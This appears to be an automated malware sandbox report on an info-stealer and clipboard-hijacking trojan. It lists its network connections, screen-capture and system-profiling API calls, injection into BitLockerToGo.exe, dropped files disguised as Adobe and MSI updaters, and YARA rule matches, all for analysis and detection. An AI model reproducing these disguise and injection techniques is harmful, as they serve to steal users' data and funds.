Source: D87fZN3R3jFeplaces.sqlite.3.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE5FF0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown, 3_2_02EE5FF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_07E99080 OpenDesktopA,CreateDesktopA, 3_2_07E99080

System Summary

Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.2264717201.000000C000BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000000.00000002.2265171878.000000C000CAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.2265171878.000000C000FD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process Stats: CPU usage > 49%
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: C:\Users\user\Desktop\file.exe Code function: String function: 000000C000433780 appears 32 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E34380 appears 59 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02F47510 appears 114 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E1ACE0 appears 146 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: String function: 02E02CF0 appears 113 times
Source: file.exe Static PE information: Number of sections : 12 > 10
Source: file.exe, 00000000.00000003.2184349872.0000019161650000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2256735049.000001916163A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2239999857.0000019161670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2264717201.000000C000A1A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe, 00000000.00000002.2266583245.000000C001800000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000000.2068913511.00007FF6DE1C6000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000002.2264369355.000000C000728000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2266023505.000000C0017B6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.2266023505.000000C001400000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedotnet.exe6 vs file.exe
Source: file.exe Binary or memory string: OriginalFileName vs file.exe
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.2264717201.000000C000BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000A.00000002.2424820883.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000016.00000002.2598207071.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000B.00000002.2437046066.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000000.00000002.2265171878.000000C000CAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.2265171878.000000C000FD4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.2518294350.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000009.00000002.2430942841.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000017.00000002.2677916205.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000F.00000002.4555133321.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@26/30@2/4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F447E0 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA, 3_2_02F447E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44DE0 GetVersionExA,CreateFileW,CreateFileA,GetDiskFreeSpaceW,GetDiskFreeSpaceA, 3_2_02F44DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E845E0 CreateDirectoryA,CreateDirectoryA,CoInitialize,CoCreateInstance,CoUninitialize,PathFindExtensionA,CopyFileA,Concurrency::cancel_current_task, 3_2_02E845E0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Libraries\flhkh.scif
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Mutant created: \Sessions\1\BaseNamedObjects\jW5fQ5e-C7lR7tC1q
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File created: C:\Users\user\AppData\Local\Temp\trixyCPXDj512V5iG
